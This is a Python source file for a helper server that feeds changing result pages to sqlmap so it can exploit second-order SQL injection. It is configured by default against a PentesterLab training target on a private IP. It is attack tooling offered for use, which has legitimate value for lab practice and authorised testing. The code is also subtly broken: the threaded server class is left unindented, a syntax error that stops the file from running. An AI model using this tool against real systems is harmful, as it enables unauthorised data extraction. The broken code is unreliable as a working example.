Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import sys
import urllib
import logging
from optparse import OptionParser
# Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls
# modify as needed for your purposes
# To Use:
# Create your own implementation of the ResultsProvider class which returns the desired page with the nextResult method
# An example of how this can be done for a URL with incrementing value is shown in ResultsProviderImpl
# create an instance of the ThreadedTCPServer, and pass the resultsProvider and any desired parameters in like so
#httpd = ThreadedTCPServer(("", port), ServerHandler)
#httpd.resultsProvider = ResultsProviderImpl(url='http://server/base/path', counter=23)
#httpd.serve_forever()
# Then run sqlmap with the second order option pointing to this server, e.g.
# --second-order=http://127.0.0.1:8000/
# When sqlmap queries this server for the second order result, this server will fetch the appropriate result
# from the remote server and then supply it back to sqlmap, also allowing you to modify the response if desired
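class ResultsProvider(object):
    '''Base class used to fetch data from server for second order injection using sqlmap.

    Subclasses override nextResult() to fetch the page sqlmap should see next.
    Keyword arguments (all optional):
        url:             base URL kept in self.url for subclasses to build on
        wait:            seconds to sleep between retries (default 2.0)
        timeout:         per-request timeout in seconds (default 5)
        verify:          TLS certificate verification; default False, i.e. the
                         remote certificate is NOT checked unless verify=True is passed
        stream, proxies, headers, cookies, allow_redirects:
                         passed through to the requests session / request
        max_retries:     give up after this many failed attempts; default None
                         retries forever (the original behaviour)
    '''
    import requests
    import socket
    import time

    def __init__(self, **kwargs):
        '''Constructor with sensible requests defaults'''
        self.session = self.requests.Session()
        self.wait = kwargs.get('wait', 2.0)
        self.max_retries = kwargs.get('max_retries', None)
        self.session.verify = kwargs.get('verify', False)
        # requests.Session has no timeout / allow_redirects attributes of its
        # own: they are per-request options.  They are stored on the session
        # for backwards compatibility and applied explicitly in doRequest().
        self.session.timeout = kwargs.get('timeout', 5)
        self.session.allow_redirects = kwargs.get('allow_redirects', True)
        self.session.stream = kwargs.get('stream', False)
        self.session.proxies = kwargs.get('proxies', {})
        self.session.headers = kwargs.get('headers', {})
        self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {}))
        self.url = kwargs.get('url', None)

    def doRequest(self, url, params=None, **kwargs):
        '''Make a GET request through the session, retrying on network errors.

        The configured timeout and allow_redirects values are passed to every
        request unless the caller overrides them in kwargs; without this the
        timeout set in the constructor was never applied and a stalled target
        could block the helper indefinitely.

        Args:
            url:    URL to fetch.
            params: optional query parameters (as for requests.get).
            kwargs: further keyword arguments for requests.Session.get.
        Returns:
            the requests.Response.
        Raises:
            the last socket.error / RequestException once max_retries is exhausted.
        '''
        kwargs.setdefault('timeout', getattr(self.session, 'timeout', None))
        kwargs.setdefault('allow_redirects', getattr(self.session, 'allow_redirects', True))
        max_retries = getattr(self, 'max_retries', None)
        attempt = 0
        while True:
            try:
                return self.session.get(url, params=params, **kwargs)
            except (self.socket.error, self.requests.exceptions.RequestException):
                attempt += 1
                if max_retries is not None and attempt > max_retries:
                    raise
                logging.exception('Retrying request in %.2f seconds...', self.wait)
                self.time.sleep(self.wait)

    def nextResult(self):
        '''Redefine me to make the request and return the response.text'''
        #return self.doRequest(url='http://site/whatever/' + str(calculated_value)).text
        raise NotImplementedError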
class ResultsProviderImpl(ResultsProvider):
    '''Example implementation to exploit 2nd order injection in Pentesterlabs Web II SQL Injection.

    Every call to nextResult() fetches self.url with an integer appended; the
    integer starts at the ``counter`` keyword argument (default 1) and grows by
    one per call.
    '''

    def __init__(self, **kwargs):
        '''Accept the base-class keyword arguments plus ``counter``.'''
        super(ResultsProviderImpl, self).__init__(**kwargs)
        self.counter = kwargs.get('counter', 1)

    def nextResult(self):
        '''Fetch <url><counter>, then advance the counter and return the page text.'''
        target = self.url + str(self.counter)
        page = self.doRequest(url=target)
        # advance only after a successful fetch so a failed attempt is retried on the same id
        self.counter += 1
        return page.text
class ThreadedTCPServer(SocketServer.ThreadingTCPServer):
'''Simple Threaded TCP server'''
pass
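class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    '''HTTP request handler that answers every GET with the next page taken
    from self.server.resultsProvider (attached by whoever built the server).'''

    def _dump(self, data):
        '''Print *data* between separator lines (debug output).'''
        separator = '=' * 40 + '\n'
        print(separator)
        print(data)
        print(separator)

    def do_GET(self):
        '''Serve the next second-order result as the response body.

        The page is fetched before the status line is sent, so a failing
        upstream request produces a clean 502 instead of a half-written 200
        response.  Headers are terminated with end_headers() rather than a
        bare '\\r\\n', which is required for the buffered header handling of
        newer http.server implementations.
        '''
        debug = getattr(self.server, 'debug', False)
        if debug:
            self._dump(self.headers)
        try:
            result = self.server.resultsProvider.nextResult()
        except Exception:
            logging.exception('resultsProvider.nextResult() failed')
            self.send_error(502, 'Could not fetch second-order result')
            return
        # requests returns decoded text; the socket needs bytes, and an
        # implicit ASCII encode would blow up on any non-ASCII page.
        if not isinstance(result, bytes):
            result = result.encode('utf-8')
        self.send_response(200)
        self.end_headers()
        self.wfile.write(result)
        if debug:
            self._dump(result)
        self.wfile.write(b'\r\n')
        self.wfile.flush()
        # wfile is closed by the base handler's finish(); no explicit close needed.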
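if __name__ == '__main__':
    # Defaults for the bundled example: the base url where the second order
    # injection result appears and the id to start counting upwards from.
    defaultUrl = 'http://192.168.33.101/sqlinjection/example8/users/'
    defaultNo = 738
    parser = OptionParser(usage='%prog [options] <httpport>')
    parser.add_option('-d', '--debug', dest='debug', action='store_true', default=False,
                      help='show debugging messages')
    parser.add_option('-u', '--url', dest='url', default=defaultUrl,
                      help='base url of the page holding the second order result (default: %default)')
    parser.add_option('-c', '--counter', dest='counter', type='int', default=defaultNo,
                      help='first id appended to the base url (default: %default)')
    parser.add_option('-b', '--bind', dest='bind', default='',
                      help='address to listen on; empty means all interfaces, '
                           'use 127.0.0.1 to keep the helper reachable only locally')
    opts, args = parser.parse_args()
    if len(args) == 1:
        try:
            port = int(args[0])
        except ValueError:
            parser.print_help()
            parser.exit()
    elif args:
        # more than one positional argument was previously ignored silently
        parser.error('expected at most one <httpport> argument')
    else:
        port = 8000
    httpd = ThreadedTCPServer((opts.bind, port), ServerHandler)
    httpd.debug = opts.debug
    # add the custom resultsprovider implementation
    httpd.resultsProvider = ResultsProviderImpl(url=opts.url, counter=opts.counter)
    print("Serving at: http://%s:%s/" % (opts.bind or '127.0.0.1', str(port)))
    httpd.serve_forever()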